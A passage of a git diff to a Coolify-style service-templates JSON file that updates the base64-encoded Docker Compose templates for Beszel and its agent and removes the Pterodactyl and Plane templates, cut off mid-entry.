mFsbG93ZWRfb3JpZ2luczpcbiAgLSBodHRwOi8vcHRlcm9kYWN0eWw6ODBcbiAgLSBQQU5FTCBET01BSU4gIyBleGFtcGxlOiBodHRwczovL3B0ZXJvZGFjdHlsLWFiY2FiY2FiY2FiY2F2Yy5leGFtcGxlLmNvbVxuYWxsb3dfY29yc19wcml2YXRlX25ldHdvcms6IGZhbHNlXG5pZ25vcmVfcGFuZWxfY29uZmlnX3VwZGF0ZXM6IGZhbHNlIgo=",
-        "tags": [
-            "game",
-            "game server",
-            "management",
-            "panel",
-            "minecraft"
-        ],
-        "category": "media",
-        "logo": "svgs/pterodactyl.png",
-        "minversion": "0.0.0",
-        "port": "80, 8443"
-    },
     "qbittorrent": {
         "documentation": "https://docs.linuxserver.io/images/docker-qbittorrent/?utm_source=coolify.io",
         "slogan": "The qBittorrent project aims to provide an open-source software alternative to \u03bcTorrent.",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 88eddd10b..580834a21 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -254,7 +254,7 @@
     "beszel-agent": {
         "documentation": "https://www.beszel.dev/guide/agent-installation?utm_source=coolify.io",
         "slogan": "Monitoring agent for Beszel",
-        "compose": "c2VydmljZXM6CiAgYmVzemVsLWFnZW50OgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbC1hZ2VudDowLjE2LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMSVNURU49L2Jlc3plbF9zb2NrZXQvYmVzemVsLnNvY2sKICAgICAgLSAnSFVCX1VSTD0ke0hVQl9VUkw/fScKICAgICAgLSAnVE9LRU49JHtUT0tFTj99JwogICAgICAtICdLRVk9JHtLRVk/fScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9hZ2VudF9kYXRhOi92YXIvbGliL2Jlc3plbC1hZ2VudCcKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2s6cm8nCg==",
+        "compose": "c2VydmljZXM6CiAgYmVzemVsLWFnZW50OgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbC1hZ2VudDowLjE4LjQnCiAgICBuZXR3b3JrX21vZGU6IGhvc3QKICAgIGVudmlyb25tZW50OgogICAgICAtIExJU1RFTj0vYmVzemVsX3NvY2tldC9iZXN6ZWwuc29jawogICAgICAtIEhVQl9VUkw9JFNFUlZJQ0VfRlFETl9CRVNaRUwKICAgICAgLSAnVE9LRU49JHtUT0tFTn0nCiAgICAgIC0gJ0tFWT0ke0tFWX0nCiAgICAgIC0gJ0RJU0FCTEVfU1NIPSR7RElTQUJMRV9TU0g6LWZhbHNlfScKICAgICAgLSAnTE9HX0xFVkVMPSR7TE9HX0xFVkVMOi13YXJufScKICAgICAgLSAnU0tJUF9HUFU9JHtTS0lQX0dQVTotZmFsc2V9JwogICAgICAtICdTWVNURU1fTkFNRT0ke1NZU1RFTV9OQU1FfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9hZ2VudF9kYXRhOi92YXIvbGliL2Jlc3plbC1hZ2VudCcKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2s6cm8nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gL2FnZW50CiAgICAgICAgLSBoZWFsdGgKICAgICAgaW50ZXJ2YWw6IDYwcwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgICAgc3RhcnRfcGVyaW9kOiA1cwo=",
         "tags": [
             "beszel",
             "monitoring",
@@ -269,7 +269,7 @@
     "beszel": {
         "documentation": "https://github.com/henrygd/beszel?tab=readme-ov-file#getting-started?utm_source=coolify.io",
         "slogan": "A lightweight server resource monitoring hub with historical data, docker stats, and alerts.",
-        "compose": "c2VydmljZXM6CiAgYmVzemVsOgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbDowLjE2LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fQkVTWkVMXzgwOTAKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9kYXRhOi9iZXN6ZWxfZGF0YScKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICBiZXN6ZWwtYWdlbnQ6CiAgICBpbWFnZTogJ2hlbnJ5Z2QvYmVzemVsLWFnZW50OjAuMTYuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIExJU1RFTj0vYmVzemVsX3NvY2tldC9iZXN6ZWwuc29jawogICAgICAtICdIVUJfVVJMPWh0dHA6Ly9iZXN6ZWw6ODA5MCcKICAgICAgLSAnVE9LRU49JHtUT0tFTn0nCiAgICAgIC0gJ0tFWT0ke0tFWX0nCiAgICB2b2x1bWVzOgogICAgICAtICdiZXN6ZWxfYWdlbnRfZGF0YTovdmFyL2xpYi9iZXN6ZWwtYWdlbnQnCiAgICAgIC0gJ2Jlc3plbF9zb2NrZXQ6L2Jlc3plbF9zb2NrZXQnCiAgICAgIC0gJy92YXIvcnVuL2RvY2tlci5zb2NrOi92YXIvcnVuL2RvY2tlci5zb2NrOnJvJwo=",
+        "compose": "c2VydmljZXM6CiAgYmVzemVsOgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbDowLjE4LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fQkVTWkVMXzgwOTAKICAgICAgLSAnQ09OVEFJTkVSX0RFVEFJTFM9JHtDT05UQUlORVJfREVUQUlMUzotdHJ1ZX0nCiAgICAgIC0gJ1NIQVJFX0FMTF9TWVNURU1TPSR7U0hBUkVfQUxMX1NZU1RFTVM6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9kYXRhOi9iZXN6ZWxfZGF0YScKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSAvYmVzemVsCiAgICAgICAgLSBoZWFsdGgKICAgICAgICAtICctLXVybCcKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgwOTAnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBiZXN6ZWwtYWdlbnQ6CiAgICBpbWFnZTogJ2hlbnJ5Z2QvYmVzemVsLWFnZW50OjAuMTguNCcKICAgIG5ldHdvcmtfbW9kZTogaG9zdAogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVEVOPS9iZXN6ZWxfc29ja2V0L2Jlc3plbC5zb2NrCiAgICAgIC0gSFVCX1VSTD0kU0VSVklDRV9GUUROX0JFU1pFTAogICAgICAtICdUT0tFTj0ke1RPS0VOfScKICAgICAgLSAnS0VZPSR7S0VZfScKICAgICAgLSAnRElTQUJMRV9TU0g9JHtESVNBQkxFX1NTSDotZmFsc2V9JwogICAgICAtICdMT0dfTEVWRUw9JHtMT0dfTEVWRUw6LXdhcm59JwogICAgICAtICdTS0lQX0dQVT0ke1NLSVBfR1BVOi1mYWxzZX0nCiAgICAgIC0gJ1NZU1RFTV9OQU1FPSR7U1lTVEVNX05BTUV9JwogICAgdm9sdW1lczoKICAgICAgLSAnYmVzemVsX2FnZW50X2RhdGE6L3Zhci9saWIvYmVzemVsLWFnZW50JwogICAgICAtICdiZXN6ZWxfc29ja2V0Oi9iZXN6ZWxfc29ja2V0JwogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSAvYWdlbnQKICAgICAgICAtIGhlYWx0aAogICAgICBpbnRlcnZhbDogNjBzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
         "tags": [
             "beszel",
             "monitoring",
@@ -3658,27 +3658,6 @@
         "minversion": "0.0.0",
         "port": "80"
     },
-    "plane": {
-        "documentation": "https://docs.plane.so/self-hosting/methods/docker-compose?utm_source=coolify.io",
-        "slogan": "The open source project management tool",
-        "compose": "eC1kYi1lbnY6CiAgUEdIT1NUOiBwbGFuZS1kYgogIFBHREFUQUJBU0U6IHBsYW5lCiAgUE9TVEdSRVNfVVNFUjogJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogIFBPU1RHUkVTX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogIFBPU1RHUkVTX0RCOiBwbGFuZQogIFBPU1RHUkVTX1BPUlQ6IDU0MzIKICBQR0RBVEE6IC92YXIvbGliL3Bvc3RncmVzcWwvZGF0YQp4LXJlZGlzLWVudjoKICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgUkVESVNfUE9SVDogJyR7UkVESVNfUE9SVDotNjM3OX0nCiAgUkVESVNfVVJMOiAnJHtSRURJU19VUkw6LXJlZGlzOi8vcGxhbmUtcmVkaXM6NjM3OS99Jwp4LW1pbmlvLWVudjoKICBNSU5JT19ST09UX1VTRVI6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICBNSU5JT19ST09UX1BBU1NXT1JEOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwp4LWF3cy1zMy1lbnY6CiAgQVdTX1JFR0lPTjogJyR7QVdTX1JFR0lPTjotfScKICBBV1NfQUNDRVNTX0tFWV9JRDogJFNFUlZJQ0VfVVNFUl9NSU5JTwogIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICBBV1NfUzNfRU5EUE9JTlRfVVJMOiAnJHtBV1NfUzNfRU5EUE9JTlRfVVJMOi1odHRwOi8vcGxhbmUtbWluaW86OTAwMH0nCiAgQVdTX1MzX0JVQ0tFVF9OQU1FOiAnJHtBV1NfUzNfQlVDS0VUX05BTUU6LXVwbG9hZHN9Jwp4LW1xLWVudjoKICBSQUJCSVRNUV9IT1NUOiBwbGFuZS1tcQogIFJBQkJJVE1RX1BPUlQ6ICcke1JBQkJJVE1RX1BPUlQ6LTU2NzJ9JwogIFJBQkJJVE1RX0RFRkFVTFRfVVNFUjogJyR7U0VSVklDRV9VU0VSX1JBQkJJVE1ROi1wbGFuZX0nCiAgUkFCQklUTVFfREVGQVVMVF9QQVNTOiAnJHtTRVJWSUNFX1BBU1NXT1JEX1JBQkJJVE1ROi1wbGFuZX0nCiAgUkFCQklUTVFfREVGQVVMVF9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICBSQUJCSVRNUV9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKeC1saXZlLWVudjoKICBBUElfQkFTRV9VUkw6ICcke0FQSV9CQVNFX1VSTDotaHR0cDovL2FwaTo4MDAwfScKeC1hcHAtZW52OgogIEFQUF9SRUxFQVNFOiAnJHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICBXRUJfVVJMOiAnJHtTRVJWSUNFX0ZRRE5fUExBTkV9JwogIERFQlVHOiAnJHtERUJVRzotMH0nCiAgQ09SU19BTExPV0VEX09SSUdJTlM6ICcke0NPUlNfQUxMT1dFRF9PUklHSU5TOi1odHRwOi8vbG9jYWxob3N0fScKICBHVU5JQ09STl9XT1JLRVJTOiAnJHtHVU5JQ09STl9XT1JLRVJTOi0xfScKICBVU0VfTUlOSU86ICcke1VTRV9NSU5JTzotMX0nCiAgREFUQUJBU0VfVVJMOiAncG9zdGdyZXNxbDovLyRTRVJWSUNFX1VTRVJfUE9TVEdSRVM6JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNAcGxhbmUtZGIvcGxhbmUnCiAgU0VDUkVUX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfNjRfU0VDUkVUS0VZCiAgQU1RUF9VUkw6ICdhbXFwOi8vJHtTRVJWSUNFX1VTRVJfUkFCQklUTVF9OiR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUX1AcGxhbmUtbXE6JHtSQUJCSVRNUV9QT1JUOi01NjcyfS9wbGFuZScKICBBUElfS0VZX1JBVEVfTElNSVQ6ICcke0FQSV9LRVlfUkFURV9MSU1JVDotNjAvbWludXRlfScKICBNSU5JT19FTkRQT0lOVF9TU0w6ICcke01JTklPX0VORFBPSU5UX1NTTDotMH0nCnNlcnZpY2VzOgogIHByb3h5OgogICAgaW1hZ2U6ICdhcnRpZmFjdHMucGxhbmUuc28vbWFrZXBsYW5lL3BsYW5lLXByb3h5OiR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fUExBTkUKICAgICAgLSAnQVBQX0RPTUFJTj0ke1NFUlZJQ0VfRlFETl9QTEFORX0nCiAgICAgIC0gJ1NJVEVfQUREUkVTUz06ODAnCiAgICAgIC0gJ0ZJTEVfU0laRV9MSU1JVD0ke0ZJTEVfU0laRV9MSU1JVDotNTI0Mjg4MH0nCiAgICAgIC0gJ0JVQ0tFVF9OQU1FPSR7QVdTX1MzX0JVQ0tFVF9OQU1FOi11cGxvYWRzfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gd2ViCiAgICAgIC0gYXBpCiAgICAgIC0gc3BhY2UKICAgICAgLSBhZG1pbgogICAgICAtIGxpdmUKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIHdlYjoKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1mcm9udGVuZDoke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSB3b3JrZXIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnd2dldCAtcU8tIGh0dHA6Ly9gaG9zdG5hbWVgOjMwMDAnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUKICBzcGFjZToKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1zcGFjZToke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBhcGkKICAgICAgLSB3b3JrZXIKICAgICAgLSB3ZWIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnaGV5IHdoYXRzIHVwJwogICAgICBpbnRlcnZhbDogMnMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDE1CiAgYWRtaW46CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtYWRtaW46JHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gYXBpCiAgICAgIC0gd2ViCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIGxpdmU6CiAgICBpbWFnZTogJ2FydGlmYWN0cy5wbGFuZS5zby9tYWtlcGxhbmUvcGxhbmUtbGl2ZToke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQSV9CQVNFX1VSTDogJyR7QVBJX0JBU0VfVVJMOi1odHRwOi8vYXBpOjgwMDB9JwogICAgICBSRURJU19IT1NUOiAnJHtSRURJU19IT1NUOi1wbGFuZS1yZWRpc30nCiAgICAgIFJFRElTX1BPUlQ6ICcke1JFRElTX1BPUlQ6LTYzNzl9JwogICAgICBSRURJU19VUkw6ICcke1JFRElTX1VSTDotcmVkaXM6Ly9wbGFuZS1yZWRpczo2Mzc5L30nCiAgICBkZXBlbmRzX29uOgogICAgICAtIGFwaQogICAgICAtIHdlYgogICAgICAtIHBsYW5lLXJlZGlzCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIGFwaToKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1iYWNrZW5kOiR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICBjb21tYW5kOiAuL2Jpbi9kb2NrZXItZW50cnlwb2ludC1hcGkuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3NfYXBpOi9jb2RlL3BsYW5lL2xvZ3MnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX1JFTEVBU0U6ICcke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgICBXRUJfVVJMOiAnJHtTRVJWSUNFX0ZRRE5fUExBTkV9JwogICAgICBERUJVRzogJyR7REVCVUc6LTB9JwogICAgICBDT1JTX0FMTE9XRURfT1JJR0lOUzogJyR7Q09SU19BTExPV0VEX09SSUdJTlM6LWh0dHA6Ly9sb2NhbGhvc3R9JwogICAgICBHVU5JQ09STl9XT1JLRVJTOiAnJHtHVU5JQ09STl9XT1JLRVJTOi0xfScKICAgICAgVVNFX01JTklPOiAnJHtVU0VfTUlOSU86LTF9JwogICAgICBEQVRBQkFTRV9VUkw6ICdwb3N0Z3Jlc3FsOi8vJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUzokU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU0BwbGFuZS1kYi9wbGFuZScKICAgICAgU0VDUkVUX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfNjRfU0VDUkVUS0VZCiAgICAgIEFNUVBfVVJMOiAnYW1xcDovLyR7U0VSVklDRV9VU0VSX1JBQkJJVE1RfToke1NFUlZJQ0VfUEFTU1dPUkRfUkFCQklUTVF9QHBsYW5lLW1xOiR7UkFCQklUTVFfUE9SVDotNTY3Mn0vcGxhbmUnCiAgICAgIEFQSV9LRVlfUkFURV9MSU1JVDogJyR7QVBJX0tFWV9SQVRFX0xJTUlUOi02MC9taW51dGV9JwogICAgICBNSU5JT19FTkRQT0lOVF9TU0w6ICcke01JTklPX0VORFBPSU5UX1NTTDotMH0nCiAgICAgIFBHSE9TVDogcGxhbmUtZGIKICAgICAgUEdEQVRBQkFTRTogcGxhbmUKICAgICAgUE9TVEdSRVNfVVNFUjogJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICBQT1NUR1JFU19QQVNTV09SRDogJFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgUE9TVEdSRVNfREI6IHBsYW5lCiAgICAgIFBPU1RHUkVTX1BPUlQ6IDU0MzIKICAgICAgUEdEQVRBOiAvdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEKICAgICAgUkVESVNfSE9TVDogJyR7UkVESVNfSE9TVDotcGxhbmUtcmVkaXN9JwogICAgICBSRURJU19QT1JUOiAnJHtSRURJU19QT1JUOi02Mzc5fScKICAgICAgUkVESVNfVVJMOiAnJHtSRURJU19VUkw6LXJlZGlzOi8vcGxhbmUtcmVkaXM6NjM3OS99JwogICAgICBNSU5JT19ST09UX1VTRVI6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICAgICAgTUlOSU9fUk9PVF9QQVNTV09SRDogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICAgICAgQVdTX1JFR0lPTjogJyR7QVdTX1JFR0lPTjotfScKICAgICAgQVdTX0FDQ0VTU19LRVlfSUQ6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICAgICAgQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUzNfRU5EUE9JTlRfVVJMOiAnJHtBV1NfUzNfRU5EUE9JTlRfVVJMOi1odHRwOi8vcGxhbmUtbWluaW86OTAwMH0nCiAgICAgIEFXU19TM19CVUNLRVRfTkFNRTogJyR7QVdTX1MzX0JVQ0tFVF9OQU1FOi11cGxvYWRzfScKICAgICAgUkFCQklUTVFfSE9TVDogcGxhbmUtbXEKICAgICAgUkFCQklUTVFfUE9SVDogJyR7UkFCQklUTVFfUE9SVDotNTY3Mn0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVVNFUjogJyR7U0VSVklDRV9VU0VSX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfUEFTUzogJyR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUTotcGxhbmV9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgICBSQUJCSVRNUV9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcGxhbmUtZGIKICAgICAgLSBwbGFuZS1yZWRpcwogICAgICAtIHBsYW5lLW1xCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIHdvcmtlcjoKICAgIGltYWdlOiAnYXJ0aWZhY3RzLnBsYW5lLnNvL21ha2VwbGFuZS9wbGFuZS1iYWNrZW5kOiR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICBjb21tYW5kOiAuL2Jpbi9kb2NrZXItZW50cnlwb2ludC13b3JrZXIuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3Nfd29ya2VyOi9jb2RlL3BsYW5lL2xvZ3MnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX1JFTEVBU0U6ICcke0FQUF9SRUxFQVNFOi12MS4wLjB9JwogICAgICBXRUJfVVJMOiAnJHtTRVJWSUNFX0ZRRE5fUExBTkV9JwogICAgICBERUJVRzogJyR7REVCVUc6LTB9JwogICAgICBDT1JTX0FMTE9XRURfT1JJR0lOUzogJyR7Q09SU19BTExPV0VEX09SSUdJTlM6LWh0dHA6Ly9sb2NhbGhvc3R9JwogICAgICBHVU5JQ09STl9XT1JLRVJTOiAnJHtHVU5JQ09STl9XT1JLRVJTOi0xfScKICAgICAgVVNFX01JTklPOiAnJHtVU0VfTUlOSU86LTF9JwogICAgICBEQVRBQkFTRV9VUkw6ICdwb3N0Z3Jlc3FsOi8vJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUzokU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU0BwbGFuZS1kYi9wbGFuZScKICAgICAgU0VDUkVUX0tFWTogJFNFUlZJQ0VfUEFTU1dPUkRfNjRfU0VDUkVUS0VZCiAgICAgIEFNUVBfVVJMOiAnYW1xcDovLyR7U0VSVklDRV9VU0VSX1JBQkJJVE1RfToke1NFUlZJQ0VfUEFTU1dPUkRfUkFCQklUTVF9QHBsYW5lLW1xOiR7UkFCQklUTVFfUE9SVDotNTY3Mn0vcGxhbmUnCiAgICAgIEFQSV9LRVlfUkFURV9MSU1JVDogJyR7QVBJX0tFWV9SQVRFX0xJTUlUOi02MC9taW51dGV9JwogICAgICBNSU5JT19FTkRQT0lOVF9TU0w6ICcke01JTklPX0VORFBPSU5UX1NTTDotMH0nCiAgICAgIFBHSE9TVDogcGxhbmUtZGIKICAgICAgUEdEQVRBQkFTRTogcGxhbmUKICAgICAgUE9TVEdSRVNfVVNFUjogJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICBQT1NUR1JFU19QQVNTV09SRDogJFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgUE9TVEdSRVNfREI6IHBsYW5lCiAgICAgIFBPU1RHUkVTX1BPUlQ6IDU0MzIKICAgICAgUEdEQVRBOiAvdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEKICAgICAgUkVESVNfSE9TVDogJyR7UkVESVNfSE9TVDotcGxhbmUtcmVkaXN9JwogICAgICBSRURJU19QT1JUOiAnJHtSRURJU19QT1JUOi02Mzc5fScKICAgICAgUkVESVNfVVJMOiAnJHtSRURJU19VUkw6LXJlZGlzOi8vcGxhbmUtcmVkaXM6NjM3OS99JwogICAgICBNSU5JT19ST09UX1VTRVI6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICAgICAgTUlOSU9fUk9PVF9QQVNTV09SRDogJFNFUlZJQ0VfUEFTU1dPUkRfTUlOSU8KICAgICAgQVdTX1JFR0lPTjogJyR7QVdTX1JFR0lPTjotfScKICAgICAgQVdTX0FDQ0VTU19LRVlfSUQ6ICRTRVJWSUNFX1VTRVJfTUlOSU8KICAgICAgQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZOiAkU0VSVklDRV9QQVNTV09SRF9NSU5JTwogICAgICBBV1NfUzNfRU5EUE9JTlRfVVJMOiAnJHtBV1NfUzNfRU5EUE9JTlRfVVJMOi1odHRwOi8vcGxhbmUtbWluaW86OTAwMH0nCiAgICAgIEFXU19TM19CVUNLRVRfTkFNRTogJyR7QVdTX1MzX0JVQ0tFVF9OQU1FOi11cGxvYWRzfScKICAgICAgUkFCQklUTVFfSE9TVDogcGxhbmUtbXEKICAgICAgUkFCQklUTVFfUE9SVDogJyR7UkFCQklUTVFfUE9SVDotNTY3Mn0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfVVNFUjogJyR7U0VSVklDRV9VU0VSX1JBQkJJVE1ROi1wbGFuZX0nCiAgICAgIFJBQkJJVE1RX0RFRkFVTFRfUEFTUzogJyR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUTotcGxhbmV9JwogICAgICBSQUJCSVRNUV9ERUZBVUxUX1ZIT1NUOiAnJHtSQUJCSVRNUV9WSE9TVDotcGxhbmV9JwogICAgICBSQUJCSVRNUV9WSE9TVDogJyR7UkFCQklUTVFfVkhPU1Q6LXBsYW5lfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gYXBpCiAgICAgIC0gcGxhbmUtZGIKICAgICAgLSBwbGFuZS1yZWRpcwogICAgICAtIHBsYW5lLW1xCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gZWNobwogICAgICAgIC0gJ2hleSB3aGF0cyB1cCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIGJlYXQtd29ya2VyOgogICAgaW1hZ2U6ICdhcnRpZmFjdHMucGxhbmUuc28vbWFrZXBsYW5lL3BsYW5lLWJhY2tlbmQ6JHtBUFBfUkVMRUFTRTotdjEuMC4wfScKICAgIGNvbW1hbmQ6IC4vYmluL2RvY2tlci1lbnRyeXBvaW50LWJlYXQuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xvZ3NfYmVhdC13b3JrZXI6L2NvZGUvcGxhbmUvbG9ncycKICAgIGVudmlyb25tZW50OgogICAgICBBUFBfUkVMRUFTRTogJyR7QVBQX1JFTEVBU0U6LXYxLjAuMH0nCiAgICAgIFdFQl9VUkw6ICcke1NFUlZJQ0VfRlFETl9QTEFORX0nCiAgICAgIERFQlVHOiAnJHtERUJVRzotMH0nCiAgICAgIENPUlNfQUxMT1dFRF9PUklHSU5TOiAnJHtDT1JTX0FMTE9XRURfT1JJR0lOUzotaHR0cDovL2xvY2FsaG9zdH0nCiAgICAgIEdVTklDT1JOX1dPUktFUlM6ICcke0dVTklDT1JOX1dPUktFUlM6LTF9JwogICAgICBVU0VfTUlOSU86ICcke1VTRV9NSU5JTzotMX0nCiAgICAgIERBVEFCQVNFX1VSTDogJ3Bvc3RncmVzcWw6Ly8kU0VSVklDRV9VU0VSX1BPU1RHUkVTOiRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTQHBsYW5lLWRiL3BsYW5lJwogICAgICBTRUNSRVRfS0VZOiAkU0VSVklDRV9QQVNTV09SRF82NF9TRUNSRVRLRVkKICAgICAgQU1RUF9VUkw6ICdhbXFwOi8vJHtTRVJWSUNFX1VTRVJfUkFCQklUTVF9OiR7U0VSVklDRV9QQVNTV09SRF9SQUJCSVRNUX1AcGxhbmUt